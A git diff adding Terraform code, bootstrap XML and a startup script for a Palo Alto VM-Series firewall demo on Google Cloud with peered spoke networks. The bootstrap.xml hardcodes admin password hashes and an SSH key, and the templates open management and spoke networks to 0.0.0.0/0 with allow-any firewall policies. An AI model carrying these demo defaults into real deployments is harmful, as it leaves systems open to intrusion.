+ min_cpu_platform = var.cpu_platform
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ tags = var.tags
+
+ metadata = {
+ mgmt-interface-swap = var.mgmt_interface_swap
+ vmseries-bootstrap-gce-storagebucket = var.bootstrap_bucket
+ serial-port-enable = true
+ ssh-keys = var.ssh_key
+ }
+
+ service_account {
+ scopes = var.scopes
+ }
+
+ network_interface {
+
+ dynamic "access_config" {
+ for_each = var.nic0_public_ip ? [""] : []
+ content {}
+ }
+ network_ip = element(var.nic0_ip, count.index)
+ subnetwork = var.subnetworks[0]
+ }
+
+ network_interface {
+ dynamic "access_config" {
+ for_each = var.nic1_public_ip ? [""] : []
+ content {}
+ }
+ network_ip = element(var.nic1_ip, count.index)
+ subnetwork = var.subnetworks[1]
+ }
+
+ network_interface {
+ dynamic "access_config" {
+ for_each = var.nic2_public_ip ? [""] : []
+ content {}
+ }
+ network_ip = element(var.nic2_ip, count.index)
+ subnetwork = var.subnetworks[2]
+ }
+
+ boot_disk {
+ initialize_params {
+ image = var.image
+ type = var.disk_type
+ }
+ }
+
+ depends_on = [
+ null_resource.dependency_getter
+ ]
+}
+
+resource "google_compute_instance_group" "vmseries" {
+ count = var.create_instance_group ? length(var.names) : 0
+ name = "${element(var.names, count.index)}-${element(var.zones, count.index)}-ig"
+ zone = element(var.zones, count.index)
+ instances = [google_compute_instance.vmseries[count.index].self_link]
+
+ named_port {
+ name = "http"
+ port = "80"
+ }
+
+ lifecycle {
+ create_before_destroy = true
+ }
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vmseries/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/vmseries/outputs.tf
new file mode 100644
index 00000000..01e5f41b
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vmseries/outputs.tf
@@ -0,0 +1,24 @@
+output "vm_names" {
+ value = google_compute_instance.vmseries.*.name
+}
+
+output "vm_self_link" {
+ value = google_compute_instance.vmseries.*.self_link
+}
+
+output "instance_group" {
+ value = google_compute_instance_group.vmseries.*.self_link
+}
+
+output "nic0_public_ip" {
+ value = var.nic0_public_ip ? google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip : []
+}
+
+output "nic1_public_ip" {
+ value = var.nic1_public_ip ? google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip : []
+}
+
+output "nic2_public_ip" {
+ value = var.nic2_public_ip ? google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip : []
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vmseries/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/vmseries/variables.tf
new file mode 100644
index 00000000..a10b4dbe
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vmseries/variables.tf
@@ -0,0 +1,102 @@
+variable "subnetworks" {
+ type = list(string)
+}
+
+variable "names" {
+ type = list(string)
+}
+
+variable "machine_type" {
+}
+
+variable "zones" {
+ type = list(string)
+}
+
+variable "cpu_platform" {
+ default = "Intel Broadwell"
+}
+variable "disk_type" {
+ default = "pd-ssd"
+ #default = "pd-standard"
+}
+variable "bootstrap_bucket" {
+ default = ""
+}
+
+variable "ssh_key" {
+ default = ""
+}
+
+variable "public_lb_create" {
+ default = false
+}
+
+variable "scopes" {
+ type = list(string)
+
+ default = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+}
+
+variable "image" {
+}
+
+variable "tags" {
+ type = list(string)
+ default = []
+}
+
+variable "create_instance_group" {
+ type = bool
+ default = false
+}
+
+variable "instance_group_names" {
+ type = list(string)
+ default = ["vmseries-instance-group"]
+}
+
+variable "dependencies" {
+ type = list(string)
+ default = []
+}
+
+variable "nic0_ip" {
+ type = list(string)
+ default = [""]
+}
+
+variable "nic1_ip" {
+ type = list(string)
+ default = [""]
+}
+
+variable "nic2_ip" {
+ type = list(string)
+ default = [""]
+}
+
+variable "mgmt_interface_swap" {
+ default = ""
+}
+
+variable "nic0_public_ip" {
+ type = bool
+ default = false
+}
+
+variable "nic1_public_ip" {
+ type = bool
+ default = false
+}
+
+variable "nic2_public_ip" {
+ type = bool
+ default = false
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vpc/main.tf b/gcp/adv_peering_4fw_2spoke/modules/vpc/main.tf
new file mode 100644
index 00000000..0c614e1d
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vpc/main.tf
@@ -0,0 +1,27 @@
+resource "google_compute_network" "default" {
+ name = var.vpc
+ delete_default_routes_on_create = var.delete_default_route
+ auto_create_subnetworks = false
+}
+
+resource "google_compute_subnetwork" "default" {
+ count = length(var.subnets)
+ name = element(var.subnets, count.index)
+ ip_cidr_range = element(var.cidrs, count.index)
+ region = element(var.regions, count.index)
+ network = google_compute_network.default.self_link
+}
+
+resource "google_compute_firewall" "default" {
+ count = length(var.allowed_sources) != 0 ? 1 : 0
+ name = "${google_compute_network.default.name}-ingress"
+ network = google_compute_network.default.self_link
+ direction = "INGRESS"
+ source_ranges = var.allowed_sources
+
+ allow {
+ protocol = var.allowed_protocol
+ ports = var.allowed_ports
+ }
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vpc/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/vpc/outputs.tf
new file mode 100644
index 00000000..e92488eb
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vpc/outputs.tf
@@ -0,0 +1,24 @@
+output "subnetwork_id" {
+ value = google_compute_subnetwork.default.*.id
+}
+
+output "subnetwork_name" {
+ value = google_compute_subnetwork.default.*.name
+}
+
+output "subnetwork_self_link" {
+ value = google_compute_subnetwork.default.*.self_link
+}
+
+output "vpc_name" {
+ value = google_compute_network.default.*.name
+}
+
+output "vpc_id" {
+ value = google_compute_network.default.*.id[0]
+}
+
+output "vpc_self_link" {
+ value = google_compute_network.default.*.self_link[0]
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vpc/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/vpc/variables.tf
new file mode 100644
index 00000000..faccda44
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vpc/variables.tf
@@ -0,0 +1,33 @@
+variable "vpc" {
+}
+
+variable "subnets" {
+ type = list(string)
+}
+
+variable "cidrs" {
+ type = list(string)
+}
+
+variable "regions" {
+ type = list(string)
+}
+
+variable "allowed_sources" {
+ type = list(string)
+ default = []
+}
+
+variable "allowed_protocol" {
+ default = "all"
+}
+
+variable "allowed_ports" {
+ type = list(string)
+ default = []
+}
+
+variable "delete_default_route" {
+ default = "false"
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/outputs.tf b/gcp/adv_peering_4fw_2spoke/outputs.tf
new file mode 100644
index 00000000..e81fb61e
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/outputs.tf
@@ -0,0 +1,30 @@
+#-----------------------------------------------------------------------------------------------
+# Outputs
+output "GLB-ADDR" {
+ value = "http://${module.glb.address}"
+}
+
+output "MGMT-FW1" {
+ value = "https://${module.fw_inbound.nic1_public_ip[0]}"
+}
+
+output "MGMT-FW2" {
+ value = "https://${module.fw_inbound.nic1_public_ip[1]}"
+}
+
+output "MGMT-FW3" {
+ value = "https://${module.fw_outbound.nic1_public_ip[0]}"
+}
+
+output "MGMT-FW4" {
+ value = "https://${module.fw_outbound.nic1_public_ip[1]}"
+}
+
+output "SSH-TO-SPOKE1" {
+ value = "ssh ${var.spoke_user}@${module.fw_inbound.nic0_public_ip[0]} -p 221 -i ${replace(var.public_key_path, ".pub", "")}"
+}
+
+output "SSH-TO-SPOKE2" {
+ value = "ssh ${var.spoke_user}@${module.fw_inbound.nic0_public_ip[0]} -p 222 -i ${replace(var.public_key_path, ".pub", "")}"
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/project.tf b/gcp/adv_peering_4fw_2spoke/project.tf
new file mode 100644
index 00000000..835af2dc
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/project.tf
@@ -0,0 +1,18 @@
+terraform {
+ required_version = ">= 0.12"
+}
+
+provider "google" {
+ # credentials = var.auth_file
+ project = var.project_id
+ region = var.region
+}
+
+provider "google-beta" {
+ # credentials = var.auth_file
+ project = var.project_id
+ region = var.region
+ version = "> 2.13.0"
+}
+
+data "google_compute_zones" "available" {}
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php b/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php
new file mode 100644
index 00000000..19c37318
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php
@@ -0,0 +1,62 @@
+
+ SOURCE & DESTINATION ADDRESSES
+ ';
+echo ''. "INTERVAL" .': '. $time .' ';
+$localIPAddress = getHostByName(getHostName());
+$sourceIPAddress = getRealIpAddr();
+echo ''. "SOURCE IP" .': '. $sourceIPAddress .' ';
+echo ''. "LOCAL IP" .': '. $localIPAddress .' ';
+
+$vm_name = gethostname();
+echo ''. "VM NAME" .': '. $vm_name .' ';
+echo ''. ' ';
+echo '
+ HEADER INFORMATION
+ ';
+/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */
+foreach ($_SERVER as $header => $value) {
+ if (substr($header, 0, 5) == 'HTTP_') {
+ /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */
+ $clean_header = strtolower(substr($header, 5, strlen($header)));
+
+ /* Replace underscores by the dashes, as the browser sends them */
+ $clean_header = str_replace('_', '-', $clean_header);
+
+ /* Cleanup: standard headers are first-letter uppercase */
+ $clean_header = ucwords($clean_header, " \t\r\n\f\v-");
+
+ /* And show'm */
+ echo ''. $header .': '. $value .' ';
+ }
+}
+?>
diff --git a/gcp/adv_peering_4fw_2spoke/scripts/webserver-startup.sh b/gcp/adv_peering_4fw_2spoke/scripts/webserver-startup.sh
new file mode 100644
index 00000000..94f78467
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/scripts/webserver-startup.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+until sudo apt-get update; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y apache2; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 2; done
+until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done
+until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done
+until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/spokes.tf b/gcp/adv_peering_4fw_2spoke/spokes.tf
new file mode 100644
index 00000000..ce369362
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/spokes.tf
@@ -0,0 +1,112 @@
+#-----------------------------------------------------------------------------------------------
+# Create spoke2 vpc with 2 web VMs (with internal LB). Create peer link with trust VPC.
+module "vpc_spoke1" {
+ source = "./modules/vpc/"
+ vpc = var.spoke1_vpc
+ subnets = var.spoke1_subnets
+ cidrs = var.spoke1_cidrs
+ regions = [var.region]
+ allowed_sources = ["0.0.0.0/0"]
+ delete_default_route = true
+}
+
+module "vm_spoke1" {
+ source = "./modules/vm/"
+ names = var.spoke1_vms
+ zones = [
+ data.google_compute_zones.available.names[0],
+ data.google_compute_zones.available.names[1]
+ ]
+ subnetworks = [module.vpc_spoke1.subnetwork_self_link[0]]
+ machine_type = "f1-micro"
+ image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ create_instance_group = true
+ ssh_key = fileexists(var.public_key_path) ? "${var.spoke_user}:${file(var.public_key_path)}" : ""
+ startup_script = file("${path.module}/scripts/webserver-startup.sh")
+}
+
+module "ilb_web" {
+ source = "./modules/ilb/"
+ name = var.spoke1_ilb
+ subnetworks = [module.vpc_spoke1.subnetwork_self_link[0]]
+ all_ports = false
+ ports = ["80"]
+ health_check_port = "80"
+ ip_address = var.spoke1_ilb_ip
+ backends = {
+ "0" = [
+ {
+ group = module.vm_spoke1.instance_group[0]
+ failover = false
+ },
+ {
+ group = module.vm_spoke1.instance_group[1]
+ failover = false
+ }
+ ]
+ }
+ providers = {
+ google = google-beta
+ }
+}
+
+resource "google_compute_network_peering" "trust_to_spoke1" {
+ name = "${var.trust_vpc}-to-${var.spoke1_vpc}"
+ provider = google-beta
+ network = module.vpc_trust.vpc_self_link
+ peer_network = module.vpc_spoke1.vpc_self_link
+ export_custom_routes = true
+}
+
+resource "google_compute_network_peering" "spoke1_to_trust" {
+ name = "${var.spoke1_vpc}-to-${var.trust_vpc}"
+ provider = google-beta
+ network = module.vpc_spoke1.vpc_self_link
+ peer_network = module.vpc_trust.vpc_self_link
+ import_custom_routes = true
+
+ depends_on = [google_compute_network_peering.trust_to_spoke1]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create spoke2 vpc with VM. Create peer link with trust VPC.
+module "vpc_spoke2" {
+ source = "./modules/vpc/"
+ vpc = var.spoke2_vpc
+ subnets = var.spoke2_subnets
+ cidrs = var.spoke2_cidrs
+ regions = [var.region]
+ allowed_sources = ["0.0.0.0/0"]
+ delete_default_route = true
+}
+
+module "vm_spoke2" {
+ source = "./modules/vm/"
+ names = var.spoke2_vms
+ zones = [data.google_compute_zones.available.names[0]]
+ machine_type = "f1-micro"
+ image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ subnetworks = [module.vpc_spoke2.subnetwork_self_link[0]]
+ ssh_key = fileexists(var.public_key_path) ? "${var.spoke_user}:${file(var.public_key_path)}" : ""
+}
+
+resource "google_compute_network_peering" "trust_to_spoke2" {
+ name = "${var.trust_vpc}-to-${var.spoke2_vpc}"
+ provider = google-beta
+ network = module.vpc_trust.vpc_self_link
+ peer_network = module.vpc_spoke2.vpc_self_link
+ export_custom_routes = true
+
+ depends_on = [google_compute_network_peering.spoke1_to_trust]
+}
+
+resource "google_compute_network_peering" "spoke2_to_trust" {
+ name = "${var.spoke2_vpc}-to-${var.trust_vpc}"
+ provider = google-beta
+ network = module.vpc_spoke2.vpc_self_link
+ peer_network = module.vpc_trust.vpc_self_link
+ import_custom_routes = true
+
+ depends_on = [google_compute_network_peering.trust_to_spoke2]
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/terraform.tfvars b/gcp/adv_peering_4fw_2spoke/terraform.tfvars
new file mode 100644
index 00000000..df20d345
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/terraform.tfvars
@@ -0,0 +1,44 @@
+#project_id = ""
+#public_key_path = "~/.ssh/gcp-demo.pub"
+
+#fw_panos = "byol-904"
+#fw_panos = "bundle1-904"
+#fw_panos = "bundle2-904"
+
+
+#-------------------------------------------------------------------
+region = "us-east4"
+
+mgmt_vpc = "mgmt-vpc"
+mgmt_subnet = ["mgmt"]
+mgmt_cidr = ["192.168.0.0/24"]
+mgmt_sources = ["0.0.0.0/0"]
+
+untrust_vpc = "untrust-vpc"
+untrust_subnet = ["untrust"]
+untrust_cidr = ["192.168.1.0/24"]
+
+trust_vpc = "trust-vpc"
+trust_subnet = ["trust"]
+trust_cidr = ["192.168.2.0/24"]
+
+spoke1_vpc = "spoke1-vpc"
+spoke1_subnets = ["spoke1-subnet1"]
+spoke1_cidrs = ["10.10.1.0/24"]
+spoke1_vms = ["spoke1-vm1", "spoke1-vm2"]
+spoke1_ilb = "spoke1-ilb"
+spoke1_ilb_ip = "10.10.1.100"
+
+spoke2_vpc = "spoke2-vpc"
+spoke2_subnets = ["spoke2-subnet1"]
+spoke2_cidrs = ["10.10.2.0/24"]
+spoke2_vms = ["spoke2-vm1"]
+spoke_user = "demo"
+
+fw_names_inbound = ["vmseries01", "vmseries02"]
+fw_names_outbound = ["vmseries03", "vmseries04"]
+fw_machine_type = "n1-standard-4"
+
+glb_name = "vmseries-glb"
+ilb_name = "vmseries-ilb"
+
diff --git a/gcp/adv_peering_4fw_2spoke/variables.tf b/gcp/adv_peering_4fw_2spoke/variables.tf
new file mode 100644
index 00000000..780f0a40
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/variables.tf
@@ -0,0 +1,116 @@
+variable "project_id" {
+ description = "GCP Project ID"
+}
+
+# variable "auth_file" {
+# description = "GCP Project auth file"
+# }
+
+variable "region" {
+}
+
+variable "fw_panos" {
+ description = "VM-Series license and PAN-OS (ie: bundle1-814, bundle2-814, or byol-814)"
+}
+
+variable "fw_image" {
+ default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries"
+}
+
+variable "fw_names_inbound" {
+ type = list(string)
+}
+
+variable "fw_names_outbound" {
+ type = list(string)
+}
+
+variable "fw_machine_type" {
+}
+
+variable "glb_name" {
+}
+
+variable "ilb_name" {
+}
+
+variable "mgmt_vpc" {
+}
+
+variable "mgmt_subnet" {
+ type = list(string)
+}
+
+variable "mgmt_cidr" {
+ type = list(string)
+}
+
+variable "untrust_vpc" {
+}
+
+variable "untrust_subnet" {
+ type = list(string)
+}
+
+variable "untrust_cidr" {
+ type = list(string)
+}
+
+variable "trust_vpc" {
+}
+
+variable "trust_subnet" {
+ type = list(string)
+}
+
+variable "trust_cidr" {
+ type = list(string)
+}
+
+variable "mgmt_sources" {
+ type = list(string)
+}
+
+variable "spoke1_vpc" {
+}
+
+variable "spoke1_subnets" {
+ type = list(string)
+}
+
+variable "spoke1_cidrs" {
+ type = list(string)
+}
+
+variable "spoke1_vms" {
+ type = list(string)
+}
+
+variable "spoke1_ilb" {
+}
+
+variable "spoke1_ilb_ip" {
+}
+
+variable "spoke2_vpc" {
+}
+
+variable "spoke2_subnets" {
+ type = list(string)
+}
+
+variable "spoke2_cidrs" {
+ type = list(string)
+}
+
+variable "spoke2_vms" {
+ type = list(string)
+}
+
+variable "spoke_user" {
+ description = "SSH user for spoke Linux VM"
+}
+
+variable "public_key_path" {
+ description = "Local path to public SSH key. If you do not have a public key, run >> ssh-keygen -f ~/.ssh/demo-key -t rsa -C admin"
+}
diff --git a/gcp/gcp-ilbnh/README.md b/gcp/gcp-ilbnh/README.md
new file mode 100644
index 00000000..904ccc45
--- /dev/null
+++ b/gcp/gcp-ilbnh/README.md
@@ -0,0 +1,22 @@
+# gcp-ilbnh
+ILB as next hop in GCP\
+This repository is intended to be used in conjunction with the 2-spoke advanced peering demo template:
+
+https://github.com/wwce/terraform/tree/master/gcp/adv_peering_2fw_2spoke
+
+This template may be used simultaneouly with or subsequent to the advanced peering template and will create an additional pair of FW behind an internal load balancer that can be used for outbound loadbalancing of TCP (only) traffic to provide redundancy of outbound connectivity.
+
+ILB as next hop is not currently GA. Consequently, routes will need to be modified post-deployment with the following gcloud CLI command:
+
+gcloud beta compute routes create default-ilbnh \\ \
+--network=trust-vpc \\ \
+--destination-range=0.0.0.0/0 \\ \
+--next-hop-ilb=ilbnh-all \\ \
+--next-hop-ilb-region=\ \\ \
+--priority=99
+
+N.B. - This template was developed/tested using Terraform 0.11.
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/gcp/gcp-ilbnh/bootstrap_files_ilbnh/authcodes b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/authcodes
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/gcp/gcp-ilbnh/bootstrap_files_ilbnh/bootstrap.xml b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/bootstrap.xml
new file mode 100644
index 00000000..9f506a10
--- /dev/null
+++ b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/bootstrap.xml
@@ -0,0 +1,632 @@
+
+
+
+
+
+ $1$eyegmtyu$VFbNwpbaZ8sUG40wpdo/A/
+
+
+ yes
+
+
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u
+
+
+
+
+ yes
+
+
+ $1$xxqwnwvr$El9XN5KexgoltjkVjbkcd0
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ health-check
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+ no
+ yes
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+ real-time
+
+
+ high
+
+
+ high
+
+
+ medium
+
+
+ medium
+
+
+ low
+
+
+ low
+
+
+ low
+
+
+
+
+
+
+
+
+
+ no
+
+
+ 1.25
+ 0.5
+ 900
+ 300
+ 900
+ yes
+
+
+
+
+ yes
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+ ethernet1/1
+ ethernet1/2
+ loopback.1
+
+
+
+
+
+
+
+
+
+
+
+ 192.168.2.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/1
+ 10
+ 35.191.0.0/16
+
+
+
+
+
+
+ 192.168.2.1
+
+
+ None
+
+
+ no
+ any
+ 2
+
+ ethernet1/1
+ 10
+ 130.211.0.0/22
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/1
+ 10
+ 10.10.1.0/24
+
+
+
+
+
+
+ no
+ any
+ 2
+
+
+ 192.168.2.1
+
+
+ None
+
+ ethernet1/1
+ 10
+ 10.10.2.0/24
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ no
+ yes
+ no
+
+
+ updates.paloaltonetworks.com
+
+
+
+
+ wednesday
+ 01:02
+ download-only
+
+
+
+
+ US/Pacific
+
+ yes
+ yes
+
+ PA-VM
+
+
+
+ yes
+
+
+ FQDN
+
+
+
+ yes
+ no
+ yes
+ no
+
+
+ 8.8.8.8
+ 4.2.2.2
+ mgmt-interface-swap
+
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/1
+ loopback.1
+
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+
+
+
+
+
+
+
+
+ untrust
+
+
+ trust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+ allow
+
+
+
+ trust
+
+
+ trust
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+ allow
+ universal
+
+
+
+
+
+
+ drop
+ no
+ yes
+
+
+ deny
+ no
+ yes
+
+
+
+
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+ untrust
+
+
+ trust
+
+
+
+ any
+
+ any
+
+
+
+ trust
+
+
+ trust
+
+
+
+ any
+
+ any
+ ethernet1/1
+
+ 100.64.0.1
+
+
+
+
+
+
+
+
+ ethernet1/1
+ ethernet1/2
+ loopback.1
+
+
+
+
+
+
+
+
diff --git a/gcp/gcp-ilbnh/bootstrap_files_ilbnh/init-cfg.txt b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/init-cfg.txt
new file mode 100644
index 00000000..8d3c0290
--- /dev/null
+++ b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/gcp-ilbnh/ilbnh.tf b/gcp/gcp-ilbnh/ilbnh.tf
new file mode 100644
index 00000000..45879ab7
--- /dev/null
+++ b/gcp/gcp-ilbnh/ilbnh.tf
@@ -0,0 +1,66 @@
+provider "google" {
+ credentials = "${var.main_project_authfile}"
+ project = "${var.main_project}"
+ region = "${var.region}"
+ alias = "ilbnh"
+}
+#************************************************************************************
+# CREATE GCP BUCKET FOR VMSERIES BOOTSTRAP - ILBNH
+#************************************************************************************
+module "bootstrap_ilbnh" {
+ source = "./modules/create_bootstrap_bucket_ilbnh/"
+ bucket_name = "vmseries-ilbnh"
+ randomize_bucket_name = true
+ file_location = "bootstrap_files_ilbnh/"
+ enable_ilbnh = "${var.enable_ilbnh}"
+ config = ["init-cfg.txt", "bootstrap.xml"] // default []
+ license = ["authcodes"] // default []
+ # content = ["panupv2-all-contents-8133-5346", "panup-all-antivirus-2917-3427", "panupv2-all-wildfire-331212-333889"] // default []
+ # software = ["PanOS_vm-9.0.0"] // default []
+}
+
+#************************************************************************************
+# CREATE 2xVMSERIES FIREWALL W/ 3 NICS (MGMT VPC, UNTRUST VPC, TRUST VPC) - ILBNH
+#************************************************************************************
+module "vm_fw_ilbnh" {
+ source = "./modules/create_vmseries_ilbnh/"
+ fw_names = ["vmseries03", "vmseries04"]
+ fw_machine_type = "n1-standard-4"
+ fw_zones = ["${var.region}-a", "${var.region}-b"]
+ fw_subnetworks = ["${module.vpc_trust.subnetwork_self_link[0]}", "${module.vpc_mgmt.subnetwork_self_link[0]}", "${module.vpc_untrust.subnetwork_self_link[0]}"]
+ enable_ilbnh = "${var.enable_ilbnh}"
+ fw_nic0_ip = ["192.168.2.4", "192.168.2.5"] // default [""] - enables dynamically assigned IP
+ fw_nic1_ip = ["192.168.0.4", "192.168.0.5"]
+ fw_nic2_ip = ["192.168.1.4", "192.168.1.5"]
+
+ fw_bootstrap_bucket = "${module.bootstrap_ilbnh.bucket_name}"
+ fw_ssh_key = "admin:${var.vmseries_ssh_key}"
+ fw_image = "${var.vmseries_image}"
+
+ create_instance_group = true
+ instance_group_names = ["vmseries03-ig", "vmseries04-ig"] // default "vmseries-instance-group"
+
+ dependencies = [
+ "${module.bootstrap_ilbnh.completion}",
+ ]
+}
+
+#************************************************************************************
+# CREATE VMSERIES INTERNAL LOAD BALANCER - ILBNH
+#************************************************************************************
+module "vmseries_internal_lb_ilbnh" {
+ source = "./modules/create_ilbnh/"
+ internal_lb_name_ilbnh = "ilbnh"
+ internal_lb_ports_ilbnh = "22"
+ subnetworks = ["${module.vpc_trust.subnetwork_self_link[0]}"]
+ internal_lbnh_ip = "192.168.2.6"
+ enable_ilbnh = "${var.enable_ilbnh}"
+ backends = [
+ {
+ group = "${module.vm_fw_ilbnh.instance_group[0]}"
+ },
+ {
+ group = "${module.vm_fw_ilbnh.instance_group[1]}"
+ },
+ ]
+}
diff --git a/gcp/gcp-ilbnh/ilbnh_override.tf b/gcp/gcp-ilbnh/ilbnh_override.tf
new file mode 100644
index 00000000..d3bb02dd
--- /dev/null
+++ b/gcp/gcp-ilbnh/ilbnh_override.tf
@@ -0,0 +1,7 @@
+#************************************************************************************
+# ILBNH
+#************************************************************************************
+variable "enable_ilbnh" {
+ description = "If set to true, enable ILB as Next Hop"
+ default = true
+}
diff --git a/gcp/gcp-ilbnh/modules/create_bootstrap_bucket_ilbnh/main.tf b/gcp/gcp-ilbnh/modules/create_bootstrap_bucket_ilbnh/main.tf
new file mode 100644
index 00000000..23092e2b
--- /dev/null
+++ b/gcp/gcp-ilbnh/modules/create_bootstrap_bucket_ilbnh/main.tf
@@ -0,0 +1,124 @@
